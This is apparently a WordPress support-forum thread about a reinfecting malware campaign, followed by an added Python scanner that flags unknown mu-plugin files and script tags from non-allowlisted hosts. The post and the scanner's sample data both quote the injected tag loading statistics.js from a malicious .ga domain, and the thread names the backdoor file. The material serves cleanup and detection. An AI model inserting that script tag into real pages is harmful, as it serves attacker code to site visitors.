• Resolved pmoondi

    (@pmoondi)


    There was another thread about this that was marked resolved last night for some reason even though the issue has clearly not been resolved.

    I thought I found the backdoor (rms_unique_wp_mu_pl_fl_nm.php) in /wp-content/mu-plugins/ but despite deleting that file and cleaning everything out, the script was reinjected into all of my pages/posts this morning.

    I noticed yesterday that the script was injected into header.php, which was a first (previously it would go into all posts/pages or functions.php).

    This morning, the url in the script itself was slightly different:
    <script src='https://js.donatelloflowfirstly.ga/statistics.js?n=ns1' type='text/javascript'></script>

    In the past it’s been stats.js or stat.js

    How the hell do we get rid of this thing? Wordfence has not been helpful!

    Removing the redirect/script code is easy enough, but please do not mark this thread as resolved until we get the backdoor identified and removed as this virus is relentless and keeps coming back.

    • This topic was modified 4 years, 3 months ago by pmoondi.
Viewing 3 replies - 1 through 3 (of 3 total)
  • I have the same problem. I make changes to files with suspicious codes and the next day the site is redirected and attacked by malware again.

    Plugin Support wfphil

    (@wfphil)

    Hi @pmoondi & @tato-ferreira

    There are many aspects of your website security that it is impossible for any WordPress security plugin to protect against.

    You will need to carry out a very thorough and extensive investigation as outlined in our site cleaning guide below:

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    A Z

    (@ahmedzeidan)

    Hi there,

    From my experience, rms_unique_wp_mu_pl_fl_nm.php belongs to a nulled theme or plugin which gives hackers access back to your website, you need to review all the plugins and remove the nulled / old ones with no support since the malware script finds its way around it.

    Even after cleaning the DB/scripts, the malware original code is sitting there as encrypted code that executes itself and therefore you get hacked every couple of days.

    Hire a security professional to clean the encrypted malware files and fix the vulnerability once and for all.

    Ahmed

  • The topic ‘donatelloflowfirstly malware/virus’ is closed to new replies.
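
The thread names three places to check after each reinfection: unexpected PHP files in /wp-content/mu-plugins/, and injected script tags in theme files such as header.php and functions.php. The following is an added example, not part of the thread and not Wordfence code, that reports both; the function names, the allowlist host `example.com` and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*['"]([^'"]+)['"]""", re.I)

def external_script_hosts(text, allowed_hosts):
    """Hosts of <script src> tags in text that are not on the allowlist."""
    hosts = set()
    for src in SCRIPT_SRC.findall(text):
        try:
            host = urlparse(src).hostname  # None for relative URLs
        except ValueError:
            continue
        if host and host.lower() not in allowed_hosts:
            hosts.add(host.lower())
    return hosts

def scan_wp_content(wp_content, allowed_hosts, known_mu_plugins=()):
    """Return sorted (relative path, reason) findings under wp-content."""
    root = Path(wp_content)
    findings = set()
    # mu-plugins are loaded on every request without being activated,
    # so any PHP file there that the site owner did not install is flagged.
    for f in (root / "mu-plugins").glob("*.php"):
        if f.name not in known_mu_plugins:
            findings.add((f.relative_to(root).as_posix(), "unexpected mu-plugin"))
    for f in root.rglob("*.php"):
        text = f.read_text(encoding="utf-8", errors="replace")
        for host in external_script_hosts(text, allowed_hosts):
            findings.add((f.relative_to(root).as_posix(), "script from " + host))
    return sorted(findings)

def build_sample_tree(base):
    """Constructed sample tree using the file name and tag quoted in the thread."""
    files = {
        "mu-plugins/rms_unique_wp_mu_pl_fl_nm.php": "<?php // constructed stub\n",
        "themes/demo/header.php": "<head><script src='https://js.donatelloflowfirstly.ga/"
                                  "statistics.js?n=ns1' type='text/javascript'></script></head>\n",
        "themes/demo/footer.php": "<script src=\"https://example.com/app.js\"></script>\n",
        "themes/demo/functions.php": "<?php // clean\n",
    }
    for rel, body in files.items():
        path = Path(base) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body, encoding="utf-8")
    return Path(base)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for path, reason in scan_wp_content(build_sample_tree(tmp), {"example.com"}):
            print(path, "->", reason)
```

Posts and pages live in the database rather than in files, so the same `external_script_hosts` check can be run over exported post content. Matching on any non-allowlisted host rather than one file name keeps the check useful when the script name changes, as it did between stat.js, stats.js and statistics.js.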